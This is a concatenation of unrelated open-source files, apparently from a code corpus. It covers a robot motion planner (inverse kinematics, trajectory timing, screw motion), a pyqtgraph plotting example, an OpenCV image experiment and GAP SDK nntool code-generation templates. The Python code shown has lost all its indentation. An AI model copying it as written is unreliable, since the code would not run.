self.srdf = self.urdf.replace(".urdf", ".srdf")
for i in range(n_link):
for j in range(n_link):
if cnt[i][j] == sample_time:
link1 = self.user_link_names[i]
link2 = self.user_link_names[j]
print("Ignore collision pair: (%s, %s), reason: always collide" % (link1, link2))
collision = ET.SubElement(root, 'disable_collisions')
collision.set('link1', link1)
collision.set('link2', link2)
collision.set('reason', 'Default')
srdffile = open(self.srdf, "w")
srdffile.write(minidom.parseString(ET.tostring(root)).toprettyxml(indent=" "))
srdffile.close()
print("Saving the SRDF file to %s" % self.srdf)
def distance_6D(self, p1, q1, p2, q2):
return np.linalg.norm(p1 - p2) + min(
np.linalg.norm(q1 - q2), np.linalg.norm(q1 + q2)
)
def check_joint_limit(self, q):
n = len(q)
flag = True
for i in range(n):
if self.joint_types[i].startswith("JointModelR"):
if np.abs(q[i] - self.joint_limits[i][0]) < 1e-3:
continue
q[i] -= (
2
* np.pi
* np.floor((q[i] - self.joint_limits[i][0]) / (2 * np.pi))
)
if q[i] > self.joint_limits[i][1] + 1e-3:
flag = False
else:
if (
q[i] < self.joint_limits[i][0] - 1e-3
or q[i] > self.joint_limits[i][1] + 1e-3
):
flag = False
return flag
def IK(self, goal_pose, start_qpos, mask = [], n_init_qpos=20, threshold=1e-3):
index = self.link_name_2_idx[self.move_group]
min_dis = 1e9
idx = self.move_group_joint_indices
qpos0 = np.copy(start_qpos)
results = []
self.robot.set_qpos(start_qpos, True)
for i in range(n_init_qpos):
ik_results = self.pinocchio_model.compute_IK_CLIK(
index, goal_pose, start_qpos, mask
)
flag = self.check_joint_limit(ik_results[0]) # will clip qpos
# check collision
self.planning_world.set_qpos_all(ik_results[0][idx])
if (len(self.planning_world.collide_full()) != 0):
flag = False
if flag:
self.pinocchio_model.compute_forward_kinematics(ik_results[0])
new_pose = self.pinocchio_model.get_link_pose(index)
tmp_dis = self.distance_6D(
goal_pose[:3], goal_pose[3:], new_pose[:3], new_pose[3:]
)
if tmp_dis < min_dis:
min_dis = tmp_dis
if tmp_dis < threshold:
result = ik_results[0]
unique = True
for j in range(len(results)):
if np.linalg.norm(results[j][idx] - result[idx]) < 0.1:
unique = False
if unique:
results.append(result)
start_qpos = self.pinocchio_model.get_random_configuration()
mask_len = len(mask)
if mask_len > 0:
for j in range(mask_len):
if mask[j]:
start_qpos[j] = qpos0[j]
if len(results) != 0:
status = "Success"
elif min_dis != 1e9:
status = (
"IK Failed! Distance %lf is greater than threshold %lf."
% (min_dis, threshold)
)
else:
status = "IK Failed! Cannot find valid solution."
return status, results
def TOPP(self, path, step=0.1, verbose=False):
N_samples = path.shape[0]
dof = path.shape[1]
assert dof == len(self.joint_vel_limits)
assert dof == len(self.joint_acc_limits)
ss = np.linspace(0, 1, N_samples)
path = ta.SplineInterpolator(ss, path)
pc_vel = constraint.JointVelocityConstraint(self.joint_vel_limits)
pc_acc = constraint.JointAccelerationConstraint(self.joint_acc_limits)
instance = algo.TOPPRA(
[pc_vel, pc_acc], path, parametrizer="ParametrizeConstAccel"
)
jnt_traj = instance.compute_trajectory()
ts_sample = np.linspace(
0, jnt_traj.duration, int(jnt_traj.duration / step)
)
qs_sample = jnt_traj(ts_sample)
qds_sample = jnt_traj(ts_sample, 1)
qdds_sample = jnt_traj(ts_sample, 2)
return ts_sample, qs_sample, qds_sample, qdds_sample, jnt_traj.duration
def update_point_cloud(self, pc, resolution=1e-3):
self.planning_world.update_point_cloud(pc, resolution)
def update_attached_box(self, size, pose, link_id=-1):
if link_id == -1:
link_id = self.move_group_link_id
self.planning_world.update_attached_box(size, link_id, pose)
def plan(
self,
goal_pose,
current_qpos,
mask = [],
time_step=0.1,
rrt_range=0.1,
planning_time=1,
fix_joint_limits=True,
use_point_cloud=False,
use_attach=False,
verbose=False,
):
self.planning_world.set_use_point_cloud(use_point_cloud)
self.planning_world.set_use_attach(use_attach)
n = current_qpos.shape[0]
if fix_joint_limits:
for i in range(n):
if current_qpos[i] < self.joint_limits[i][0]:
current_qpos[i] = self.joint_limits[i][0] + 1e-3
if current_qpos[i] > self.joint_limits[i][1]:
current_qpos[i] = self.joint_limits[i][1] - 1e-3
self.robot.set_qpos(current_qpos, True)
collisions = self.planning_world.collide_full()
if len(collisions) != 0:
print("Invalid start state!")
for collision in collisions:
print("%s and %s collide!" % (collision.link_name1, collision.link_name2))
idx = self.move_group_joint_indices
ik_status, goal_qpos = self.IK(goal_pose, current_qpos, mask)
if ik_status != "Success":
return {"status": ik_status}
if verbose:
print("IK results:")
for i in range(len(goal_qpos)):
print(goal_qpos[i])
goal_qpos_ = []
for i in range(len(goal_qpos)):
goal_qpos_.append(goal_qpos[i][idx])
self.robot.set_qpos(current_qpos, True)
status, path = self.planner.plan(
current_qpos[idx],
goal_qpos_,
range=rrt_range,
verbose=verbose,
time=planning_time,
)
if status == "Exact solution":
if verbose:
ta.setup_logging("INFO")
else:
ta.setup_logging("WARNING")
times, pos, vel, acc, duration = self.TOPP(path, time_step)
return {
"status": "Success",
"time": times,
"position": pos,
"velocity": vel,
"acceleration": acc,
"duration": duration,
}
else:
return {"status": "RRT Failed. %s" % status}
def plan_screw(
self,
target_pose,
qpos,
qpos_step=0.1,
time_step=0.1,
use_point_cloud=False,
use_attach=False,
verbose=False,
):
self.planning_world.set_use_point_cloud(use_point_cloud)
self.planning_world.set_use_attach(use_attach)
qpos = np.copy(qpos)
self.robot.set_qpos(qpos, True)
def pose7D2mat(pose):
mat = np.eye(4)
mat[0:3, 3] = pose[:3]
mat[0:3, 0:3] = quat2mat(pose[3:])
return mat
def skew(vec):
return np.array(
[
[0, -vec[2], vec[1]],
[vec[2], 0, -vec[0]],
[-vec[1], vec[0], 0],
]
)
def pose2exp_coordinate(pose: np.ndarray) -> Tuple[np.ndarray, float]:
def rot2so3(rotation: np.ndarray):
assert rotation.shape == (3, 3)
if np.isclose(rotation.trace(), 3):
return np.zeros(3), 1
if np.isclose(rotation.trace(), -1):
return np.zeros(3), -1e6
theta = np.arccos((rotation.trace() - 1) / 2)
omega = (
1
/ 2
/ np.sin(theta)
* np.array(
[
rotation[2, 1] - rotation[1, 2],
rotation[0, 2] - rotation[2, 0],
rotation[1, 0] - rotation[0, 1],
]
).T
)
return omega, theta
omega, theta = rot2so3(pose[:3, :3])
if theta < -1e5:
return omega, theta
ss = skew(omega)
inv_left_jacobian = (
np.eye(3) / theta
- 0.5 * ss
+ (1.0 / theta - 0.5 / np.tan(theta / 2)) * ss @ ss
)
v = inv_left_jacobian @ pose[:3, 3]
return np.concatenate([v, omega]), theta
self.pinocchio_model.compute_forward_kinematics(qpos)
ee_index = self.link_name_2_idx[self.move_group]
current_p = pose7D2mat(self.pinocchio_model.get_link_pose(ee_index))
target_p = pose7D2mat(target_pose)
relative_transform = target_p @ np.linalg.inv(current_p)
omega, theta = pose2exp_coordinate(relative_transform)
if theta < -1e4:
return {"status": "screw plan failed."}
omega = omega.reshape((-1, 1)) * theta
index = self.move_group_joint_indices
path = [np.copy(qpos[index])]
while True:
self.pinocchio_model.compute_full_jacobian(qpos)
J = self.pinocchio_model.get_link_jacobian(ee_index, local=False)
delta_q = np.linalg.pinv(J) @ omega
delta_q *= qpos_step / (np.linalg.norm(delta_q))
delta_twist = J @ delta_q
flag = False
if np.linalg.norm(delta_twist) > np.linalg.norm(omega):
ratio = np.linalg.norm(omega) / np.linalg.norm(delta_twist)
delta_q = delta_q * ratio
delta_twist = delta_twist * ratio
flag = True
qpos += delta_q.reshape(-1)
omega -= delta_twist
def check_joint_limit(q):
n = len(q)
for i in range(n):
if (
q[i] < self.joint_limits[i][0] - 1e-3
or q[i] > self.joint_limits[i][1] + 1e-3
):
return False
return True
within_joint_limit = check_joint_limit(qpos)
self.planning_world.set_qpos_all(qpos[index])
collide = self.planning_world.collide()
if (
np.linalg.norm(delta_twist) < 1e-4
or collide
or within_joint_limit == False
):
return {"status": "screw plan failed"}
path.append(np.copy(qpos[index]))
if flag:
if verbose:
ta.setup_logging("INFO")
else:
ta.setup_logging("WARNING")
times, pos, vel, acc, duration = self.TOPP(
np.vstack(path), time_step
)
return {
"status": "Success",
"time": times,
"position": pos,
"velocity": vel,
"acceleration": acc,
"duration": duration,
}
``` |
{
"source": "0000matteo0000/pyqtgraph",
"score": 3
} |
#### File: pyqtgraph/examples/MultiAxisPlotWidgetExample.py
```python
import numpy as np
import pyqtgraph as pg
from pyqtgraph.Qt.QtWidgets import QMainWindow
def mkStripedPen(colors, blending=0.0001, span=[0, 15], orientation="horizontal", width=2):
stops = []
stops_colors = []
previous = None
for i, color in enumerate(colors + [None]):
pos = i / len(colors)
if previous is not None:
stops.append(pos - blending)
stops_colors.append(previous)
if color is not None:
stops.append(pos)
stops_colors.append(color)
previous = color
return pg.ColorMap(stops, stops_colors, mapping=pg.ColorMap.REPEAT).getPen(span=span, orientation=orientation, width=width)
app = pg.mkQApp()
mw = QMainWindow()
mw.resize(800, 400)
pg.setConfigOption("background", "w")
pg.setConfigOption("foreground", "k")
mpw = pg.MultiAxisPlotWidget()
mw.setCentralWidget(mpw)
mw.show()
# LEGEND
mpw.addLegend(offset=(0, 0))
# TITLE
mpw.setTitle("MultiAxisPlotWidget Example")
# AXYS
ax1 = mpw.addAxis("sx1", "bottom", text="Samples1", units="sx1")
ax1c = "red"
ax1.setPen(ax1c)
ax2 = mpw.addAxis("sx2", "bottom", text="Samples2", units="sx2")
ax2c = "green"
ax2.setPen(ax2c)
ay1 = mpw.addAxis("sy1", "left", text="Data1", units="sy1")
ay1c = "cyan"
ay1.setPen(ay1c)
ay2 = mpw.addAxis("sy2", "left", text="Data2", units="sy2")
ay2c = "magenta"
ay2.setPen(ay2c)
# CHARTS
c0, pi0 = mpw.addChart("Dataset 0")
c0.setPen("black")
c1, pi1 = mpw.addChart("Dataset 1", xAxisName="sx1", yAxisName="sy1")
c1.setPen(mkStripedPen([ax1c, ay1c]))
c2, pi2 = mpw.addChart("Dataset 2", xAxisName="sx2", yAxisName="sy1")
c2.setPen(mkStripedPen([ax2c, ay1c]))
c3, pi3 = mpw.addChart("Dataset 3", xAxisName="sx2", yAxisName="sy2")
c3.setPen(mkStripedPen([ax2c, ay2c]))
# make and display chart
mpw.makeLayout(
# optional, selects and orders axes displayed.
# remember to include the default axes if used.
axes=["bottom", "sx1", "sx2", "sy2", "sy1", "left"],
# optional, selects charts displayed
charts=["Dataset 0", "Dataset 1", "Dataset 2", "Dataset 3"]
)
mpw.enableAxisAutoRange()
for i, c in enumerate([c0, c1, c2, c3, ], start=1):
c.setData(np.array(np.sin(np.linspace(0, i * 2 * np.pi, num=1000))))
mpw.update()
# Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
pg.exec()
``` |
{
"source": "0000sir/opencv-graphic-experiments",
"score": 3
} |
#### File: opencv-graphic-experiments/x-4/x-4.py
```python
import cv2
import numpy as np
def separate_frame(frame, width, height):
odd_frame = np.zeros((height, width, 3), np.uint8)
even_frame = np.zeros((height,width, 3), np.uint8)
for x in range(0, height-1):
for y in range(0, width-1):
point = frame[x, y]
r0 = point[2]%2==0 and point[2] or 0
g0 = point[1]%2==0 and point[1] or 0
b0 = point[0]%2==0 and point[0] or 0
r1 = point[2]%2==1 and point[2] or 0
g1 = point[1]%2==1 and point[1] or 0
b1 = point[0]%2==1 and point[0] or 0
even_frame[x,y] = [g0, r0, b0]
odd_frame[x,y] = [g1, r1, b1]
return (odd_frame, even_frame)
img = cv2.imread('../people.jpg')
#cv2.imshow('img', img)
height, width = img.shape[:2]
img0,img1 = separate_frame(img, width, height)
cv2.imshow('img-0', img0)
cv2.imshow('img-1', img1)
cv2.waitKey(0)
cv2.destroyAllWindows()
``` |
{
"source": "00-01/gap_sdk",
"score": 2
} |
#### File: nntool/execution/execution_progress.py
```python
class ExecutionProgress(object):
__instance = None
def __new__(cls):
if ExecutionProgress.__instance is None:
ExecutionProgress.__instance = object.__new__(cls)
return ExecutionProgress.__instance
def __init__(self):
if not hasattr(self, 'listeners'):
self.listeners = []
@classmethod
def progress(cls, step_idx, name):
inst = cls()
for func in inst.listeners:
func(step_idx, name)
@classmethod
def start(cls):
inst = cls()
for func in inst.listeners:
func(None, "start")
@classmethod
def end(cls):
inst = cls()
for func in inst.listeners:
func(None, "end")
@classmethod
def listen(cls, func):
inst = cls()
inst.listeners.append(func)
@classmethod
def unlisten(cls, func):
inst = cls()
inst.listeners.remove(func)
```
#### File: symbolic/q15_quantization/q15_scale_float.py
```python
from ..function import Function
from ..symbol import nargs, Constant, c_headers, copy_props
@nargs(1)
@c_headers('"Gap.h"')
@copy_props('to_qrec')
class Q15ScaleFloat(Function):
def __init__(self, *args, to_qrec=None, **kwargs):
self._to_qrec = to_qrec
super().__init__(*args, **kwargs)
@property
def to_qrec(self):
return self._to_qrec
def _eval(self, *args, **kwargs):
if isinstance(args[0], Constant):
return Constant(self._to_qrec.quantize_and_clip(args[0].value))
return args[0]
def _impl(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip(val)
def _py_expr(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip_py_expr(val)
def _c_expr(self, *args, **kwargs):
val = args[0]
return self._to_qrec.quantize_and_clip_c_expr(val)
def __repr__(self) -> str:
return f"ScaleFloat({self.contents[0]}, ->[{self._to_qrec}])"
```
#### File: generation/at_generators/cnn_pool_relu.py
```python
from .utils import at_bits
GEN_POOL_RELU = "CNN_PoolReLU"
# extern void CNN_PoolReLU(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int In_DataSize,
# int Out_DataSize,
# int In_InL3, // 1 if In comes from L3, 0 if it comes from L2
# int Out_InL3,
# int InFeat,
# int OutFeat,
# int Width,
# int Height,
# KernelOper_T PoolOper,
# int Fpx,
# int Fpy,
# int Dpx,
# int Dpy,
# int Spx,
# int Spy,
# int PoolPad,
# KernelOper_T ReLUOper
# );
# pylint: disable=too-many-arguments
def gen_at_pool_relu(code_block, name, in_q, out_q, in_dim,
out_dim, at_pool, at_active, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
gen_ctrl = "0"
else:
gen_ctrl = gen_ctrl.ctrl_name
if at_pool.PoolOper == 'KOP_NONE':
if in_dim.is_named and in_dim.has_keys(['c', 'w', 'h']):
dims = [in_dim.c, in_dim.h, in_dim.w, in_dim.c]
else:
dims = in_dim.shape.copy()
dims = dims + [1] * (4 - len(dims))
if out_dim.is_named and out_dim.has_key('c'):
dims[3] = out_dim.c
else:
dims[3] = dims[0]
else:
dims = [in_dim.c, in_dim.h, in_dim.w, out_dim.c]
if at_ver < 3:
code_block.write('{}("{}", {}, {}, {}, 1, 1, {}, {}, {}, {},',
GEN_POOL_RELU, name, gen_ctrl, at_bits(in_q), at_bits(out_q),
dims[0], dims[3], dims[2], dims[1])
else:
code_block.write('{}("{}", {}, {}, {}, {}, {}, 1, 1, {}, {}, {}, {},',
GEN_POOL_RELU, name, gen_ctrl, at_bits(
in_q), at_bits(out_q), in_q.q, out_q.q,
dims[0], dims[3], dims[2], dims[1])
code_block.indent()
code_block.write('{}, {}, {}, {}, {}, {}, {}, {}, {});',
at_pool.PoolOper, at_pool.Fpx, at_pool.Fpy,
at_pool.Dpx, at_pool.Dpy, at_pool.Spx, at_pool.Spy,
at_pool.PoolPad, at_active.ReLUOper)
code_block.deindent()
```
#### File: nntool/generation/default_appl_main_template.py
```python
from .templet import stringfunction
import os
import numpy as np
GWT_HEADER = '''
/*
* Copyright (C) 2017 GreenWaves Technologies
* All rights reserved.
*
* This software may be modified and distributed under the terms
* of the BSD license. See the LICENSE file for details.
*
*/
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_template(G, gen, test_inputs=None, test_outputs=None, tolerance=0.0):
'''
${GWT_HEADER}
/* Autotiler includes. */
#include "${gen.project_name}.h"
#include "${gen.project_name}Kernels.h"
#ifdef __EMUL__
#define pmsis_exit(n) exit(n)
#endif
#ifndef STACK_SIZE
#define STACK_SIZE 1024
#endif
${gen.flash_pointer} ${gen.project_name}_L3_Flash = 0;
${gen.generate_main_appl_inout_def(test_inputs, test_outputs)}
static void cluster()
{
#ifdef PERF
printf("Start timer\\n");
gap_cl_starttimer();
gap_cl_resethwtimer();
#endif
${gen.project_name}CNN(${gen.gen_inout_list()});
printf("Runner completed\\n");
${gen.generate_output_check(tolerance, indent=1) if test_outputs else ""}
}
int test_${gen.project_name}(void)
{
printf("Entering main controller\\n");
/* ---------------->
* Put here Your input settings
* <---------------
*/
#ifndef __EMUL__
/* Configure And open cluster. */
struct pi_device cluster_dev;
struct pi_cluster_conf cl_conf;
cl_conf.id = 0;
pi_open_from_conf(&cluster_dev, (void *) &cl_conf);
if (pi_cluster_open(&cluster_dev))
{
printf("Cluster open failed !\\n");
pmsis_exit(-4);
}
int cur_fc_freq = pi_freq_set(PI_FREQ_DOMAIN_FC, ${gen.opts['fc_freq']});
if (cur_fc_freq == -1)
{
printf("Error changing frequency !\\nTest failed...\\n");
pmsis_exit(-4);
}
int cur_cl_freq = pi_freq_set(PI_FREQ_DOMAIN_CL, ${gen.opts['cl_freq']});
if (cur_cl_freq == -1)
{
printf("Error changing frequency !\\nTest failed...\\n");
pmsis_exit(-5);
}
#ifdef __GAP9__
pi_freq_set(PI_FREQ_DOMAIN_PERIPH, 250000000);
#endif
#endif
// IMPORTANT - MUST BE CALLED AFTER THE CLUSTER IS SWITCHED ON!!!!
printf("Constructor\\n");
int ConstructorErr = ${gen.project_name}CNN_Construct();
if (ConstructorErr)
{
printf("Graph constructor exited with error: %d\\n(check the generated file ${gen.project_name}Kernels.c to see which memory have failed to be allocated)\\n", ConstructorErr);
pmsis_exit(-6);
}
printf("Call cluster\\n");
#ifndef __EMUL__
struct pi_cluster_task task = {0};
task.entry = cluster;
task.arg = NULL;
task.stack_size = (unsigned int) STACK_SIZE;
task.slave_stack_size = (unsigned int) SLAVE_STACK_SIZE;
pi_cluster_send_task_to_cl(&cluster_dev, &task);
#else
cluster();
#endif
${gen.project_name}CNN_Destruct();
#ifdef PERF
{
unsigned int TotalCycles = 0, TotalOper = 0;
printf("\\n");
for (unsigned int i=0; i<(sizeof(AT_GraphPerf)/sizeof(unsigned int)); i++) {
printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", AT_GraphNodeNames[i], AT_GraphPerf[i], AT_GraphOperInfosNames[i], ((float) AT_GraphOperInfosNames[i])/ AT_GraphPerf[i]);
TotalCycles += AT_GraphPerf[i]; TotalOper += AT_GraphOperInfosNames[i];
}
printf("\\n");
printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", "Total", TotalCycles, TotalOper, ((float) TotalOper)/ TotalCycles);
printf("\\n");
}
#endif
printf("Ended\\n");
pmsis_exit(0);
return 0;
}
int main(int argc, char *argv[])
{
printf("\\n\\n\\t *** NNTOOL ${gen.project_name} Example ***\\n\\n");
#ifdef __EMUL__
test_${gen.project_name}();
#else
return pmsis_kickoff((void *) test_${gen.project_name});
#endif
return 0;
}
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_header(G, gen):
'''
#ifndef __${gen.project_name}_H__
#define __${gen.project_name}_H__
#define __PREFIX(x) ${gen.project_name} ## x
// Include basic GAP builtins defined in the Autotiler
#include "Gap.h"
#ifdef __EMUL__
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/param.h>
#include <string.h>
#endif
extern ${gen.flash_pointer} ${gen.project_name}_L3_Flash;
#endif
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_make(G, gen, quantized, open_args=""):
'''
NNTOOL=nntool
${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in gen.G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"}
${"MODEL_POW2=1" if "POW2" in gen.G.quantization.schemes_present else "# MODEL_POW2=1"}
${"MODEL_FP16=1" if any(qrec.ktype == "float" for qrec in G.quantization.values()) else "# MODEL_FP16=1"}
${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"}
MODEL_SUFFIX?=
MODEL_PREFIX?=${gen.project_name}
MODEL_PYTHON=python3
MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX)
TRAINED_MODEL = ${os.path.split(G.graph_identity.filename)[1]}
MODEL_EXPRESSIONS = ${"$(MODEL_BUILD)/" + gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""}
NNTOOL_EXTRA_FLAGS += ${open_args}
${"MODEL_QUANTIZED=1" if quantized else ""}
# Memory sizes for cluster L1, SoC L2 and Flash
TARGET_L1_SIZE = ${gen.opts['l1_size']}
TARGET_L2_SIZE = ${gen.opts['l2_size']}
TARGET_L3_SIZE = ${gen.opts['l3_size']}
# Cluster stack size for master core and other cores
CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']}
CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']}
CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']}
NNTOOL_SCRIPT = nntool_script
${"APP_CFLAGS += -DSTD_FLOAT" if any(qrec[1].out_qs[0].dtype == np.float16 for qrec in G.quantization.sorted_iterator(G)) else ""}
${"APP_LDFLAGS += -lm" if gen.G.has_expressions and "FLOAT" in gen.G.quantization.schemes_present else ""}
$(info GEN ... $(CNN_GEN))
'''
@stringfunction
# pylint: disable=unused-argument
def generate_main_appl_make_atproject(G, gen, quantized, model_path):
'''
NNTOOL=nntool
${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"}
${"MODEL_POW2=1" if "POW2" in G.quantization.schemes_present else "# MODEL_POW2=1"}
${"MODEL_FP16=1" if "FLOAT" in G.quantization.schemes_present else "# MODEL_FP16=1"}
${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"}
MODEL_SUFFIX?=
MODEL_PREFIX?=${gen.project_name}
MODEL_PYTHON=python3
MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX)
AT_MODEL_PATH=${model_path}
MODEL_EXPRESSIONS = ${gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""}
${"MODEL_QUANTIZED=1" if quantized else ""}
# Memory sizes for cluster L1, SoC L2 and Flash
TARGET_L1_SIZE = ${gen.opts['l1_size']}
TARGET_L2_SIZE = ${gen.opts['l2_size']}
TARGET_L3_SIZE = ${gen.opts['l3_size']}
# Cluster stack size for master core and other cores
CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']}
CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']}
CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']}
NNTOOL_SCRIPT = nntool_script
$(info GEN ... $(CNN_GEN))
'''
```
#### File: bindings/pow2/matscale_bindings_generator.py
```python
from generation.bindings import (CommentBindingList, GNodeArgEdge,
NodeBindingList)
from generation.generator_decorators import QREC_POW2, generation_function
from graph.types import MatScaleFusionParameters
@generation_function("bindings", (MatScaleFusionParameters,), qrec_types=(QREC_POW2, ))
def matscale_bindings_generator(gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
set_matscale_bindings(gen, in_eparams, out_eparams, cname, node, qrec)
return True
def set_matscale_bindings(gen, in_eparams, out_eparams, cname, params, node_q):
if params.fusion_type == "vec_scalar":
gen.bindings.append(
CommentBindingList("Node {} inq1 {} inq2 {} inq3 {} outq {}", params.name,
node_q.in_qs[0].q, node_q.in_qs[1].q,
node_q.in_qs[2].q, node_q.out_qs[0].q)
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]), GNodeArgEdge(
in_eparams[2]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")))
else:
gen.bindings.append(
CommentBindingList("Node {} inq1 {} inq2 {} outq {}", params.name,
node_q.in_qs[0].q, node_q.in_qs[1].q, node_q.out_qs[0].q)
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")))
```
#### File: kernels/mult8/rnn_kernels_generator.py
```python
import logging
from generation.at_types.gen_ctrl import GenCtrl
from generation.code_block import CodeBlock
from generation.generator_decorators import generation_function, QREC_MULT8
from graph.types import RNNParameters, LSTMParameters, GRUParameters
from ..autotiler_kernel import AutotilerKernel
LOG = logging.getLogger("nntool." + __name__)
@generation_function("kernels", (RNNParameters, LSTMParameters, GRUParameters), qrec_types=(QREC_MULT8, ))
def rnn_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname):
del in_eparams, out_eparams, qrec
gen.kernels.append(RNNKernel(node.name, cname, node,
at_ver=gen.opts['at_ver'],
gen_ctrl=node.get_gen_ctrl()))
return True
# int RNN_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
# int LSTM_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
# int GRU_Stack_SQ8(
# char *Name,
# CNN_GenControl_T *Ctrl,
# int BiasDataSize,
# int FeatDataSize,
# int NCells,
# int K0,
# int K1,
# int DimState,
# int DimIn,
# int AlwaysReset,
# int Revert
# );
def gen_rnn_sq8(code_block, kname, cname, ctrl, ncells, k0, k1, dim_state, dim_in, revert):
code_block.write(
'{}("{}", {}, 4, 1, {}, {}, {}, {}, {}, 0, {});'.format(kname, cname, ctrl,
ncells, k0,
k1, dim_state,
dim_in,
revert))
class RNNKernel(AutotilerKernel):
def __init__(self, node_name, cname, rnn_params, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
self.gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
if isinstance(rnn_params, RNNParameters):
self.kname = "RNN_Stack_SQ8"
elif isinstance(rnn_params, LSTMParameters):
self.kname = "LSTM_Stack_SQ8"
elif isinstance(rnn_params, GRUParameters):
self.kname = "GRU_Stack_SQ8"
if not rnn_params.linear_before_reset:
# gen_ctrl.linear_before_reset = 0
raise ValueError("In {} linear_before_reset == 0 not supported by the Autotiler kernels")
else:
raise ValueError("unknown RNN parameter type")
self.n_cells = rnn_params.n_cells
self.n_states = rnn_params.n_states
self.n_inputs = rnn_params.n_inputs
self.n_input_cells = rnn_params.n_input_cells
self.n_output_cells = rnn_params.n_output_cells
self.revert = rnn_params.revert
if not rnn_params.hard_act:
gen_ctrl.rnn_use_hardact = 0
if not rnn_params.rnn_same_inout_scale:
gen_ctrl.rnn_same_inout_scale = 0
self.cname = cname
self.node_name = node_name
self.at_ver = at_ver
def code(self, code_block=None):
if code_block is None:
code_block = CodeBlock()
code_block.comment("generator for {}", self.node_name)
if not self.gen_ctrl.is_unmodified:
self.gen_ctrl.gen_ctrl_decl(code_block)
gen_ctrl = self.gen_ctrl.ctrl_name
else:
gen_ctrl = "0"
gen_rnn_sq8(code_block, self.kname, self.cname, gen_ctrl, self.n_cells,
self.n_input_cells, self.n_output_cells,
self.n_states,
self.n_inputs,
self.revert and "1" or "0")
return code_block
```
#### File: kernels/pow2/matadd_kernels_generator.py
```python
from generation.templet import stringfunction
from generation.at_generators.utils import at_bits
import logging
from generation.at_generators import (NO_ACTIVATION, gen_active_at_params,
gen_at_matrixadd, gen_at_matrixadddyn,
gen_matrixadd_at_params,
gen_matrixadddyn_at_params)
from generation.at_types.gen_ctrl import GenCtrl
from generation.code_block import CodeBlock
from generation.generator_decorators import generation_function, QREC_POW2
from graph.types import MatrixAddParameters
from ..autotiler_kernel import AutotilerKernel, NewAutoTilerKernel
LOG = logging.getLogger("nntool." + __name__)
@generation_function("kernels", (MatrixAddParameters, ), qrec_types=(QREC_POW2, ))
def matadd_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname):
del in_eparams, out_eparams
if qrec.in_qs[0].q == qrec.in_qs[1].q and qrec.in_qs[0].q == qrec.out_qs[0].q:
gen.kernels.append(MatrixAddKernel(cname, node, qrec, None, None,
gen_ctrl=node.get_gen_ctrl(),
at_ver=gen.opts['at_ver']))
else:
gen.kernels.append(MatrixAddDynKernel(cname, node, qrec, None, None,
gen_ctrl=node.get_gen_ctrl(),
at_ver=gen.opts['at_ver']))
return True
class MatrixAddKernel(AutotilerKernel):
def __init__(self, cname, matrixadd_params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
self.gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
at_matrixadd_params = gen_matrixadd_at_params(matrixadd_params)
in_dim = matrixadd_params.in_dims[0]
out_dim = matrixadd_params.out_dims[0]
in_q1 = matrixadd_q.in_qs[0]
in_q2 = matrixadd_q.in_qs[1]
out_q = matrixadd_q.out_qs[0]
if act_params is not None:
at_act_params = gen_active_at_params(act_params)
out_q = act_q.out_qs[0]
if at_ver < 3:
if act_params.activation == "relu6" and out_q.q != 0:
self.gen_ctrl.ReluN = 6 << out_q.q
self.gen_ctrl.ReluNNoNorm = 1
else:
if act_params.activation == "relun":
self.gen_ctrl.ReluN = act_params.activation_params
else:
at_act_params = NO_ACTIVATION
self.at_matrixadd_params = at_matrixadd_params
self.in_dim = in_dim
self.out_dim = out_dim
self.in_q1 = in_q1
self.in_q2 = in_q2
self.out_q = out_q
